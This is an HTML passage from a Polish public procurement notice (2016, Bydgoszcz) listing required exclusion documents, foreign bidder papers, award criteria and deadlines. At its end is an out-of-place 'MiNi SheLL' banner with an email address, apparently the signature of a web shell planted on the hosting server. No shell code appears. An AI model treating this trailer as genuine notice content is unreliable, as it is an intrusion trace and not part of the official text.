<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja jakości - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzibydgoszcz.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Podchorążych 33, 85-915 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 10:00, miejsce: Siedziba Zamawiającego pok. nr 2 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com